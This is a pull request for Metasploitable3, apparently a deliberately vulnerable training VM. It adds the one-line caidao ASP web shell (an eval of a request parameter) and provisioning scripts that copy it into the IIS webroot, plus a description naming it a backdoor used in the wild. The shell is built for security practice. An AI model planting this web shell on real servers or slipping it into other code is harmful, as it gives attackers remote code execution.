### PR TITLE
Add backdoor caidao to Metasploitable3

### DIFF
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -36,6 +36,10 @@ Vagrant.configure("2") do |config|
   config.vm.provision :shell, path: "resources/iis/setup_iis.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
 
+  # Vulnerability - Chinese caidao.asp backdoor
+  config.vm.provision :shell, path: "resources/caidao/setup_caidao.bat"
+  config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614
+
   # Vulnerability - Setup for Apache Struts
   config.vm.provision :shell, path: "scripts/chocolatey_installs/java.bat"
   config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614

--- a/resources/caidao/caidao.asp
+++ b/resources/caidao/caidao.asp
@@ -1,0 +1,1 @@
+<%eval request("password")%>

--- a/resources/caidao/setup_caidao.bat
+++ b/resources/caidao/setup_caidao.bat
@@ -1,0 +1,1 @@
+copy C:\vagrant\resources\caidao\caidao.asp "C:\inetpub\wwwroot"

--- a/resources/iis/setup_iis.bat
+++ b/resources/iis/setup_iis.bat
@@ -1,2 +1,1 @@
-start /w PKGMGR.EXE /iu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;
-timeout 10
+start /w PKGMGR.EXE /iu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;IIS-ApplicationDevelopment;IIS-ASPNET;IIS-NetFxExtensibility;IIS-ASP;IIS-CGI;IIS-ISAPIExtensions;IIS-ISAPIFilter;IIS-ServerSideIncludes;


### PR DESCRIPTION
This adds caidao backdoor to Metasploitab3's IIS server. Caidao is a known Chinese backdoor used in the wild.

Verification
- [ ] Install packer with `brew install packer`
- [ ] Install packer with `brew install packer`
- [ ] Install Vagrant with `brew install vagrant`
- [ ] Install Virtualbox
- [ ] Clone this repo and check out this branch
- [ ] Build the base VM using `packer build windows_2008_r2.json`
- [ ] Add the resulting .box file to vagrant using `vagrant box add windows_2008_r2_virtualbox.box --name metasploitable3`
- [ ] Bring up the vagrant environment using the command `vagrant up`
- [ ] On your box, do: `curl -v http://[metasploitable3 ip]/caidao.asp`, you should see a 200 HTTP response
